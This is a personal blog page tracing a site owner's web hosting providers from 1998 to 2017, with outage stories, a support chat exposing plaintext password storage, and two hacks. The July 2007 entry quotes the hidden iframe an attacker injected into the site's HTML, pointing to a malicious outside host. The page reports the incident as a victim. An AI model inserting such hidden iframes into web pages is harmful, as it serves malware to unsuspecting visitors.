Willus.com Home   |   Archive   |   About  
Willus.com Hosting History

Willus.com Hosting History

  
  NOTE: If you take one thing away from this blog, take away this: use different companies for your website hosting and domain name registration. See the highlighted text below.

May 2017: Bluehost Stores Passwords in the Clear(!)
I've experienced my first real disappointment with Bluehost. They store all of the user account passwords in the clear so that their techs can use them as verification that you are who you say you are in live chat. See my conversation during a live chat wiht a bluehost tech support person on 20 May 2017 below. This is so disappointing. For those who do not know, ANY reputable company immediately encrypts (hashes) your password after you type it in and NEVER knows what it actually is. All they should be able to do is reset it. They should NOT be able to tell you what it is. For a reputable hoster to be showing passwords to all of their techs, in the clear, is very troubling.

Welcome To Live Chat
5:20:26 PM
Pramod J: Hello Willus.com, thank you for contacting us. My name is Pramod. How are you Today?

5:21:02 PM
Willus.com: Fine. I cannot access my account through SSH terminal or ftp, like I usually can. The ssh server is down maybe?

5:21:54 PM
Pramod J: Could I get the last 4 characters of the cPanel password to verify ownership of the account?

5:22:27 PM
Willus.com: You can see my cpanel password in the clear?

5:26:29 PM
Pramod J: I didn't get you, I need only last 4 digits and password will be saved only till the chat is active

5:27:14 PM
Willus.com: Can you see my entire password? In the clear?

5:31:20 PM
Willus.com: Hello?

5:33:01 PM
Pramod J: yes

5:33:16 PM
Willus.com: Yes what?

5:34:09 PM
Pramod J: I see it in clear

5:34:16 PM
Pramod J: it is not encrypted

5:34:20 PM
Willus.com: I would like to talk to a supervisor


September 2016: Smooth Sailing Since 2014
Willus.com is still hosted by BlueHost.com, and willus.org is hosted by DreamHost.com, as they have been since 2014. These companies have both proven to have reliable uptime and service over the last 2.5 years, and at reasonable prices.

December 2013: Unprofessional Parting
CWIHosting.com, as I half expected, sent me an invoice by e-mail on 12/1/2013, my renewal date, despite the fact that I had requested account cancellation two weeks before via multiple methods. All of their phone numbers are disconnected, and despite multiple subsequent cancellation requests (including by postal mail), they repeatedly e-mailed me invoice reminders--five in all over the course of eight days, but they finally stopped, with the last e-mail from them threatening to suspend my account(!). There just doesn't seem to be anybody home there. Fortunately they had no way to extract money from me because I long ago removed any payment methods from my account. Subsequent searches on the web (and multiple e-mails to me from other customers who have seen this blog) reveal that other people have had similar problems trying to part ways with CWIHosting.com. I recommend that you stay away from CWIHosting.com.

November 15, 2013: Goodbye, CWIHosting.com.
I don't know what's happened with CWIHosting.com. I kind of feel bad for them, because they've apparently got some systemic problem that they can't figure out which caused my web site to go down three times in a span of a month, each time for well over 24 hours, and one time for almost two weeks (incomprehensible to me--see next entry). The most recent time (November 12) was the final straw for me. I can't be their guinea pig while they figure things out. They also made a habit of taking away my access to gcc and making me ask them to restore it--they pulled that little stunt at least four times over the last ten years. They'd eventually restore it each time, but not without considerable aggravation on my part. So I've finally cancelled my account with them. It's too bad--I liked their service in most other respects. Their trouble ticket system is far better than Bluehost's, for example, but this uptime issue (and their response to it) has become unacceptable. Willus.com is now hosted by BlueHost.com, and willus.org is hosted by DreamHost.com.

My experience with CWIHosting.com (and before that, Prentice Internet) confirms that one of the smartest things you can do if you run a personal web site is to separate your domain name registration from your web site hosting (i.e. use different companies for each). That way if you get upset with your hosting service, you don't also have to move your domain name registration if you want to completely part ways with them. You can completely independently point your name to a new hosting service.

October 18, 2013: Hoster #3: Bluehost.com.
On October 4, 2013, my web site as hosted on cwihosting.com went down and it was not until October 17, 2013 that they restored full access to me (and they still have not restored my access to gcc). They apparently had both the main server and the backup server fail at the same time (how lucky!). This is what I heard from cwihosting.com at various times:

October 12, 2013
Thank you for your patience. The restoration is still going on and will be completed soon. Please standby for updates.

October 10, 2013
We apologize for the recent outage that has affected your service. Please be assured we are working as quickly as possible to restore service. Unfortunately a double equipment failure has delayed the process. However we are about 80% complete in restoring access. We still have data current up into the day the outage occurred.

October 8, 2013
The server is down due to a degraded RAID array. We have got the following message from our DC floor engineers. We are aware of the situation and are working to resolve the issue. Unfortunately the backup server crashed at same time and we were unable to retrieve the backups. This means we are having to manually copy the files to new drives from the degraded array. We are unable to make a backup now.


I've learned my lesson and will set up my site to auto-mirror to willus.org, hosted by BlueHost.com. BlueHost (data center located in Utah) has an A+ rating from the BBB (cwihosting is not affiliated with the BBB). I poked around on the web and read some reviews before selecting them, but they're not perfect. Already my BlueHost site has been down twice for more than a few minutes, and their support ticket system is not as good as cwihosting's. Once you've submitted, there's no way to edit your ticket or add more information, and most of their responses have not been helpful. They are typically one sentence responses along the lines of "Did you try this?" (which I tried and didn't work), or "Sorry, we can't do that." But the site is functional, I have the tools I need to make it a fully functioning mirror, and it's quite a bit less expensive than cwihosting.

March 18, 2008: Hacked again.
This time it was a malicious script uploaded by another user. See the response from my ISP:

  Your shared hosting server had a user that unknowingly uploaded an exploitable script. It was a postnuke (blogging system) module called gallery. Though CWI provides industry leading security for shared hosting and locks the server down as best as possible while still being flexible to the needs of its users, resources are still shared. For this reason, one user uploading an exploitable script, is like opening a back door to the server, giving an unknown person the keys.

This was a low risk attack as it was caught within 10 minutes and are usually used to run simple scripts that are more of an annoyance then anything else. To be sure, we have reinstalled items on the server to make sure nothing was left altered on the system, and have suspended the account that started the incident so that we can make other arrangements for them. We are also working on a script that can detect and remove .bad. files and out of date script versions uploaded by actual server users.

To fix your site, you simply need to replace your index file, at this time it seems like no other files were affected. If you need further assistance, please let us know. Thank you for your understanding.

Sincerely,
Jason A. Taylor
Chief Technical Officer
CWI Hosting.com
 

Yes, they caught it in 10 minutes, but CWI hosting never did the courtesy of sending me an e-mail that this had happened (thanks!), so I found out five days later when a friend let me know that my home page had been hacked.

July 2007: Willus.com hacked!
On July 24, 2007, I discovered that several of my HTML files on willus.com had been altered the night before. Somebody had gained FTP access to my site and added lines like this to my HTML files:

    <!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->

The .ua country code is Ukraine. After contacting tech support at CWI hosting, I was informed that the attack was coming from Hong Kong and that they'd seen this before. The tech suggested that I may have FTP'd to my site from a compromised PC that captured my password and sent it to the machine in Hong Kong. I immediately changed my password and now only FTP to my machine using secure FTP (using psftp.exe from the putty package). I also wrote a program to fix my infected HTML files. Apparently the extra line in the infected files causes vulnerable versions of Internet Explorer to infect PCs with the program that captures the passwords, and this would be how the thing spreads. That's my guess, anyway. Searching the web didn't yield much. Near as I can tell, this is related to the Trojan-Downloader.Win32.Small.evh virus, but I can't tell for sure. If anybody else has seen something like this, I'd appreciate an e-mail. This one really surprised me. It is the first time I've clearly had a password taken from right underneath my nose.

July 2005: CWI-Hosting Review--still doing well
The aftermath of the server crash was somewhat trying. I had to open several trouble tickets with CWI to get privileges that I had on the server before it crashed. For example, they set me up in a restricted, "jail shell" with no access to gcc. I could understand that they wanted to have a secure system, but they tried to deny me services that their web page clearly advertises as being part of my plan. After eventually corresponding with the head of CWI's tech department (who was very pleasant), I had my full privileges restored. Since then, I've had no issues. On the plus side, CWI has steadily been increasing my plan's disk storage quota. It is now over 1 GB, which gives me plenty of room and is hard to beat for the price I'm paying ($175/yr).

March 2005: CWI-Hosting server crash
Server crash. The server that CWI was using to host willus.com crashed this month, and the dust is still settling. The server has been very sluggish ever since coming back up on 3-21. Read here for more details.

February 2005: CWI-Hosting doing well
After over one year with CWI Hosting, I have no regrets. My web site has been up every time I've needed it, and they gave me all the features that were promised on their web site, though I had to make more than one request to get access to gcc so that I could compile my own CGI codes for my web page. In general, the CWI support center has been very responsive.

November 2003: A poor review for Prentice-Internet
I no longer use Prentice Internet for my web hosting. I am now using CWI Hosting (starter plan, $17.50/mo). Prentice had a history of doing things to my account unannounced (like resetting my password) and then apologizing after the fact rather than giving me any warning ahead of time. In the latest incident, just last month, they deleted an important file of mine while running e-mail tests on my account without my knowledge or permission. Though I believe it was not done maliciously (they were trying to figure out an e-mail problem I was having), it was still an important file. What made things much worse, however, was when I repeatedly e-mailed Prentice asking them to restore the file, and they would not respond in any way. They don't seem to be answering any of my e-mails anymore. Though at times Prentice has shown me excellent service, there have been too many occasions like I have just described, and this last case finally inspired me to look for a new hoster. CWI Hosting has a polished web site and so far (two weeks of service) they have quickly responded to questions I've had. The transition has been painless.

March 2001: Useful links
Here are two useful sites for understanding how internet numbers and addresses are assigned: ICANN (Internet Corporation for Assigned Names and Numbers) and ARIN (American Registry for Internet Numbers). Also, you can go to Netcraft.com to get information about a web site (what platform it is running and how is hosting it).

July 2000: Cable modem is great.
I've now been using cable modem for about six months ($47/mo including rental of the modem). I will never go back to dial-up. Cable modem (and DSL, I suspect) is so much nicer. It doesn't tie up your phone, there is no waiting for a connection, no busy signal, and it's fast (typical 100-400Kbytes/s downloads). My website service is still provided by Prentice. They've done an excellent job and have virtually never had down time that I've been aware of. And they are still $17/mo for 300 MB of disk space. That's very hard to beat.

October 1998: The search for a hoster
I run my web site from home. It run it solely to share information and have some fun. I started by checking to see if the domain name I wanted (willus.com) had been taken. You can get information on domain names by going to internic.net and entering the domain name. Registering a domain name with Internic is $70 for the first two years and $35/year thereafter. But to register, you'll need a web hosting service. Update 8/00: The Internet Corporation for Assigned Names and Numbers (ICANN) has now set it up so that you may now choose from any of several "accredited registrars" who can set up your domain name. This, in effect, has commercialized this part of the Internet business, which is driving the registration fee down a bit. I recently re-registered through my service provider (Prentice) for $20/year.

Web hosting services provide you with the internet IP number for your domain name and an account on a computer where you can store your web pages. Some also provide you with a dial-up connection, but usually you have to get that separately. For example, I use Prentice-Internet for my web hosting and Cox Cable for my connection (cable modem). There are literally hundreds of web hosters to choose from. I found budgetweb.com to be a great source of information on web hosting services. They have a comprehensive list of features for hundreds of web hosters. Selecting from this list, I first tried smarthosting.com, but ended up transfering to Prentice because they had more exactly what I wanted, but both are good services that give you about 300 MB for about $20-$25/month.

If you have any more questions about how I run my site, send an e-mail.

Internet speeds (T1, T3, etc.) explained

 

This page last modified
Sunday, 21-May-2017 15:48:36 MDT